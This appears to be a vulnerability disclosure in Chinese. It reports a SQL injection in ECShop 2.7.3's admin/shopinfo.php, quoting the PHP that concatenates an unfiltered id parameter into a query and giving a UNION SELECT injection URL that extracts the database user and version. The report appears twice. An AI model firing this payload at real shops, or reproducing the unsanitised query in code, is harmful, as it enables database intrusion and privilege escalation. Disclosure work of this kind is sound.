### 简要描述: ecshop最新2.7.3后台低权限用户登录以后可进行注射提权 ### 详细说明: 问题出在admin/shopinfo.php的108行 ``` if ($_REQUEST['act'] == 'edit') { /* 权限判断 */ admin_priv('shopinfo_manage'); /* 取得文章数据 */ $sql = "SELECT article_id, title, content FROM ".$ecs->table('article')."WHERE article_id =".$_REQUEST['id']; $article = $db->GetRow($sql); ``` id没有过滤直接进行查询,构造语句 ``` http://192.168.1.110/ecshop/admin/shopinfo.php?act=edit&id=111 and 1=2 union select 1,user(),version() ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201305/04000944bfaec8631051d426f7179ddc35dff1d4.png" alt="ecshop.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/04000944bfaec8631051d426f7179ddc35dff1d4.png)
### 简要描述: ecshop最新2.7.3后台低权限用户登录以后可进行注射提权 ### 详细说明: 问题出在admin/shopinfo.php的108行 ``` if ($_REQUEST['act'] == 'edit') { /* 权限判断 */ admin_priv('shopinfo_manage'); /* 取得文章数据 */ $sql = "SELECT article_id, title, content FROM ".$ecs->table('article')."WHERE article_id =".$_REQUEST['id']; $article = $db->GetRow($sql); ``` id没有过滤直接进行查询,构造语句 ``` http://192.168.1.110/ecshop/admin/shopinfo.php?act=edit&id=111 and 1=2 union select 1,user(),version() ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201305/04000944bfaec8631051d426f7179ddc35dff1d4.png" alt="ecshop.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/04000944bfaec8631051d426f7179ddc35dff1d4.png)